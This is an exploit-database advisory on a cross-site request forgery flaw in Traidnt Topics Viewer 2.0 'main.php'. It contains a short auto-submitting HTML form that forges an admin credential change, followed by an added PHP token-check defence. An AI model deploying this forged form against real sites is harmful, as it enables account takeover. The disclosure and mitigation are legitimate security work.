Traidnt Topics Viewer 2.0 - 'main.php' Cross Site Request Forgery Vulnerability

ID EDB-ID:36892
Type exploitdb
Reporter Green Hornet
Modified 2012-02-29T00:00:00


Traidnt Topics Viewer 2.0 'main.php' Cross Site Request Forgery Vulnerability. Webapps exploit for php platform


Traidnt Topics Viewer is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.

Traidnt Topics Viewer 2.0 BETA 1 is vulnerable; other versions may also be affected. 

<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="">
<input type="hidden" name="u_name" value="admin2"/>
<input type="hidden" name="u_m_pass" value="123456"/>
<input type="hidden" name="u_email" value=""/>
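
A server-side check that rejects a forged cross-site POST like the one above, given as an added example (not code from Traidnt Topics Viewer or from the original advisory): a per-session synchronizer token that a third-party page cannot read or supply. The csrf_token field name and the helper function names are assumptions; only u_name, u_m_pass and u_email come from the page.

```php
<?php
// Added example, not Traidnt code: synchronizer-token check for an admin POST.
// The csrf_token field and all helper names here are hypothetical.
declare(strict_types=1);

function start_admin_session(): void
{
    // SameSite=Strict keeps the session cookie off cross-site POSTs in
    // browsers that honour it; the token check below is the primary control.
    session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
    session_start();
}

function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_is_valid(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // hash_equals compares in constant time; an empty stored token never matches.
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

start_admin_session();
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_is_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Token verified: the application's own handling of u_name, u_m_pass
    // and u_email would continue from here.
} else {
    // The legitimate admin form embeds the token as a hidden field.
    $t = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    echo '<form method="POST">'
       . '<input type="hidden" name="csrf_token" value="' . $t . '"/>'
       . '<!-- u_name, u_m_pass and u_email inputs go here -->'
       . '</form>';
}
```

A form auto-submitted from another origin carries no csrf_token value matching the admin's session, so the handler answers 403 before any account data is touched.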